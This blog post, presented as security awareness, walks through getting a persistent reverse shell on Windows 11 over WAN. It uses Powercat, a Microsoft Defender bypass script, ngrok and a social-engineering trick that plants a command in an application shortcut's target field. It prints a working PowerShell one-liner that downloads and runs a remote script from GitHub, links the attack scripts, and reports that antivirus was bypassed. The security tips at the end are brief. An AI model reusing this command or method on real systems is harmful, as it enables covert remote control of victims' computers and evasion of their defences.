Security Tips Against Attacks on Windows 11 and Microsoft Edge via WAN

NOTE: Hello, this blog post has been written for the purpose of education and raising awareness about information security. It is essential to use authorized legal methods (White Box Test, Grey Box Test) as mentioned in this post. Our main FOCUS is on the SECURITY ADVICE section. Be sure to read that part.

Test Environment Versions

PowerShell Version Command -> Get-Host

Version 5.1.22621.169

Windows Version Command -> [Environment]::OSVersion

Windows 11 Pro 10.0.22621

Microsoft Defender Version Command -> Get-MpComputerStatus

AntivirusSignatureVersion : 1.377.509.0

GIF 1: Environment for Reverse Shell

The fundamental technique is get a reverse shell by using the application target field.(GIF 1)

Used ngrok for WAN to LAN attack. I have mentioned the installation steps in other sections.

Three scripts used. The first script was Powercat, which was used to establish a reverse shell. The second script was used to bypass Microsoft Defender. Finally, the third script merged the first and second scripts and included some social engineering techniques, such as configuring the terminal window size, closing the terminal window, and opening Microsoft Edge.

My PowerShell Script Link

Ngrok TCP URL and PORT number must be change in powershell script.

Suspicious PowerShell Script For Application Target Field

powershell.exe -c “IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/OsmanKandemir/PowerSTest/main/run.ps1');run"

Test

GIF 2: Result

The simulation has been completed over TCP, with port forwarding from WAN to LAN. Unfortunately, everything seems fine, but Defender and AV have been bypassed (as shown in GIF 2). Kali Linux is running on VMware, and both Kali and W11 are on the same network, but the attack is running over WAN.

A malicious person can get a continuous reverse shell using this method.

This method has a small difference from other methods, allows broken connections to be reconnected.

Social Engineering

A malicious person could quickly write a suspicious script in the target field of an application.

The PowerShell script (called “Suspicious Powershell Script For Target Field”) runs the “run.ps1” file when it is downloaded.

Security Tips

• If you leave your computer, you should use a lock screen.
• If you see a suspicious application running in a CMD or PowerShell window, you should be also killed it using the task manager.

Figure 1: Local Group Policy Editor

• You might block “powershell.exe” on Local Group Policy Editor. (Figure 1)

Stay Safe.

Resources

1-https://github.com/OsmanKandemir/PowerSTest/blob/main/run.ps1

2-https://github.com/besimorhino/powercat

3-https://github.com/aloksaurabh/OffenPowerSh

4-https://stackoverflow.com/a/56196508

5-https://www.youtube.com/watch?v=ZIzViKPEFIw